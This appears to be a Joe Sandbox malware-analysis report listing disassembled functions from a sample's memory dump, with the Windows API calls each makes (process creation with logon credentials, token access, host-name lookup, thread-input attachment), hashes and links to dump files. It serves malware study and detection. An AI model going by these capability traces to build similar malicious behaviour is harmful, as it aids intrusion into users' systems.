Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: a1540eb94747f4654d992faa2253dde2201efea244f3be67e139971b56e78c96
Instruction ID: 7f561ab401549b32285682df7ff821215a27b59763952a0cf38300195d282825
Opcode Fuzzy Hash: a1540eb94747f4654d992faa2253dde2201efea244f3be67e139971b56e78c96
Instruction Fuzzy Hash: 26110432604A09EEDB602F70AC0866F3798FF063A0F11442AFA04D63D1DA7989408B61

Function 007D4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D4560

Part of subcall function 007D410D: _memset.LIBCMT ref: 007D418D
Part of subcall function 007D410D: _wcscpy.LIBCMT ref: 007D41E1
Part of subcall function 007D410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D41F1

KillTimer.USER32(?,00000001,?,?), ref: 007D45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0080D6CE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 607fb78b8f3f94bef29cb643b4eda039bf222f23292d6a2d77ba333ca9272f41
Instruction ID: ee70eb401502e99e7a0ca07350fb4408409f9b287a462a1f8b26ad2538951c07
Opcode Fuzzy Hash: 607fb78b8f3f94bef29cb643b4eda039bf222f23292d6a2d77ba333ca9272f41
Instruction Fuzzy Hash: 0C21FC709047889FEB729B64DC45BE7BFECEF11308F04009EE69E96281C7795A84CB91

Function 00828AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00828B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00828B31
CloseHandle.KERNEL32(00000004), ref: 00828B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00828B7A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
Instruction ID: f6acdd6605921684ad55bc9d4e688e9e5fc5b6a0d16fa76d8cea45536cee3e72
Opcode Fuzzy Hash: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
Instruction Fuzzy Hash: 2B1159B250124DEBDF018FA4ED49FDA7BA9FF08316F044068FE04A2161C7768DA0AB60

Function 0084667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837B20,?,?,00000000), ref: 007D5B8C
Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837B20,?,?,00000000,?,?), ref: 007D5BB0

gethostbyname.WS2_32(?), ref: 008466AC
WSAGetLastError.WS2_32(00000000), ref: 008466B7
_memmove.LIBCMT ref: 008466E4
inet_ntoa.WS2_32(?), ref: 008466EF

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 196b83993c8e10aa7a6f8c7197e441d8fae17321a7efd4ce13f7150c587eb4fb
Instruction ID: 1d344f61b6f7026b29e7420f6050ff099a74ce412cfc61148188570f6a80450d
Opcode Fuzzy Hash: 196b83993c8e10aa7a6f8c7197e441d8fae17321a7efd4ce13f7150c587eb4fb
Instruction Fuzzy Hash: A9114C75500609EBCB00EBA4D98ADEEB7B8FF44311B144166F606A7262EF34AE14CB61

Function 00829023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00829043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00829055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0082906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00829086

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
Instruction ID: 2ad85724cf70eb82c1cc5740b47bcb6a7a52f0363dd91e035068d13e5d9f01b5
Opcode Fuzzy Hash: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
Instruction Fuzzy Hash: CE115E79900218FFEB10DFA5CC84E9DBBB4FB48710F2040A5EA04B7250D6716E50DB90

Function 00831652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 0083166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 00831694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 0083169E
Sleep.KERNEL32(?,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 008316D1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: b9494b0ed5e6060b93662322a2f2904f31ea41403cd5395de930bd1ea00a9899
Instruction ID: 883f91dcd1cf59011593723a99c7579c810005ac55a4fd8bdef0727301a518d4
Opcode Fuzzy Hash: b9494b0ed5e6060b93662322a2f2904f31ea41403cd5395de930bd1ea00a9899
Instruction Fuzzy Hash: 39118E31C05A2DDBCF00AFE5D84AAEEBB78FF59B02F044055EA41F2241EB7455608BD6

Function 00807207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0080722B

Part of subcall function 00807912: __fltout2.LIBCMT ref: 0080793B

__cftog_l.LIBCMT ref: 00807251
__cftoe_l.LIBCMT ref: 00807283

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 6a7f19417216fe675c64b92b5bfb1a42acdd7a7d300e05704aa4b09ee7306f98
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 8C01803284418EBBCF925F88CC018EE3F22FF19344B488515FA1998071C237E9B1AB82

Function 0085B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0085B59E
ScreenToClient.USER32(?,?), ref: 0085B5B6
ScreenToClient.USER32(?,?), ref: 0085B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0085B5F5

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: eb4b4b0f2b52a6ae15bda28e64326fc87fc938a00c2e2f303e11f472f8fa3980
Instruction ID: ff6788d47a4e9561a60a9edeadd905bb175d7f3c22a8826c03aa14532a9ef88d
Opcode Fuzzy Hash: eb4b4b0f2b52a6ae15bda28e64326fc87fc938a00c2e2f303e11f472f8fa3980
Instruction Fuzzy Hash: 9B1143B9D00209EFDB41CFA9C8849EEFBF9FB18311F108166E914E3220D735AA558F90

Function 0085B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0085B8FE
_memset.LIBCMT ref: 0085B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00897F20,00897F64), ref: 0085B93C
CloseHandle.KERNEL32 ref: 0085B94E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 0179a70cbc7e0dce5bff1f5e4a15486b5ea9a79f9372d5071f91ddc7aa04bcb6
Instruction ID: 4f5add5561a8156a25d0e3bca026995a1f2b7f17bd808e641a4842ecf805baee
Opcode Fuzzy Hash: 0179a70cbc7e0dce5bff1f5e4a15486b5ea9a79f9372d5071f91ddc7aa04bcb6
Instruction Fuzzy Hash: 7AF05EB2554304BBF6103761AC09FBB3A5CFB09355F040022BB08E52A2DB75890087A8

Function 00836E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00836E88

Part of subcall function 0083794E: _memset.LIBCMT ref: 00837983

_memmove.LIBCMT ref: 00836EAB
_memset.LIBCMT ref: 00836EB8
RtlLeaveCriticalSection.NTDLL(?), ref: 00836EC8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 72a3061a39d061d2dbfc26e7a74acd65cc7ce5f30078e4904e36aed9ba97e11b
Instruction ID: 53156884daaeff020394bc22a4046d4d6dbc5a91e5bbecb811a25ab7929c30f9
Opcode Fuzzy Hash: 72a3061a39d061d2dbfc26e7a74acd65cc7ce5f30078e4904e36aed9ba97e11b
Instruction Fuzzy Hash: 1FF0307A100204ABCF016F55DC85A5ABB2AFF45321F448061FE089E217CB35E911CBB5

Function 0085C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 007D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D135C
Part of subcall function 007D12F3: BeginPath.GDI32(?), ref: 007D1373
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0085C030
LineTo.GDI32(00000000,?,?), ref: 0085C03D
EndPath.GDI32(00000000), ref: 0085C04D
StrokePath.GDI32(00000000), ref: 0085C05B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7a8c7184a1ff742b54d0ffb5f6779d9191b1a3a4e18a71b90f4b78470dcc97e8
Instruction ID: 567a95d1965d0136846a86a30cd92c967e01b6969e6168222bd9b708962ffe74
Opcode Fuzzy Hash: 7a8c7184a1ff742b54d0ffb5f6779d9191b1a3a4e18a71b90f4b78470dcc97e8
Instruction Fuzzy Hash: 37F03A31001B59BBDB126F55AC0DFCA3F99BF05312F084051FB11610E2876A5665CF95

Function 0082A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0082A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0082A3AC
GetCurrentThreadId.KERNEL32 ref: 0082A3B3
AttachThreadInput.USER32(00000000), ref: 0082A3BA

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b4b9a3bb4cfb628141daff1f1ce729ed645ff74ef9bf478ac98671b6c9c2dee4
Instruction ID: 4e967119aacd6b74163cd894ade8b67aa4bf8f7dc9b334615faebb55aea76eb8
Opcode Fuzzy Hash: b4b9a3bb4cfb628141daff1f1ce729ed645ff74ef9bf478ac98671b6c9c2dee4
Instruction Fuzzy Hash: 25E0C971545338BBDB215BA2EC0DED77F5CFF267A2F408025FA09D5062C6758580DBA1

Function 007D2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007D2231
SetTextColor.GDI32(?,000000FF), ref: 007D223B
SetBkMode.GDI32(?,00000001), ref: 007D2250
GetStockObject.GDI32(00000005), ref: 007D2258
GetWindowDC.USER32(?,00000000), ref: 0080C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0080C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0080C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0080C112
GetPixel.GDI32(00000000,?,?), ref: 0080C132
ReleaseDC.USER32(?,00000000), ref: 0080C13D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 8c858fae1133a18c4fb5ff7d49536ed9962bdaefeb10bb66ad3245c41e160588
Instruction ID: 2bfbb19f89bb3bfb2f504b4efeb0d53bb7814b430a9a658eb94701b3800d33db
Opcode Fuzzy Hash: 8c858fae1133a18c4fb5ff7d49536ed9962bdaefeb10bb66ad3245c41e160588
Instruction Fuzzy Hash: 2CE03932140644EADF625F64EC09BD87B20FB15332F008366FBA9880E287754981DB11

Function 00828C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00828C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0082882E), ref: 00828C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0082882E), ref: 00828C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0082882E), ref: 00828C7E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 9617ef5b64237c52d7398ad8bd2470ea1e636876365e938cc2d4abfbe39d009e
Instruction ID: 04494145f203ceb9bc9777419e447c6adeaa22aed1e0eeabe68ddb5148ea6f85
Opcode Fuzzy Hash: 9617ef5b64237c52d7398ad8bd2470ea1e636876365e938cc2d4abfbe39d009e
Instruction Fuzzy Hash: ACE04F76642321DBDB605FB16D0CB973BA8FF50793F084828A345CA081DB3884818B61

Function 00812187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00812187
GetDC.USER32(00000000), ref: 00812191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008121B1
ReleaseDC.USER32(?), ref: 008121D2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 923e61b85044843278f19de4373d7ebc549f62c16b97bdbb57f3ad8a790cc0b3
Instruction ID: 93037e8ff957a4cbd0dffa6fcfeea83741a35f8f6a6ed974ace0c40c823af718
Opcode Fuzzy Hash: 923e61b85044843278f19de4373d7ebc549f62c16b97bdbb57f3ad8a790cc0b3
Instruction Fuzzy Hash: 6FE0C275800614EFDB019F60C808A9D7BF5FB58352F108426EA5AA6261DB3891419F40

Function 0081219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0081219B
GetDC.USER32(00000000), ref: 008121A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008121B1
ReleaseDC.USER32(?), ref: 008121D2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
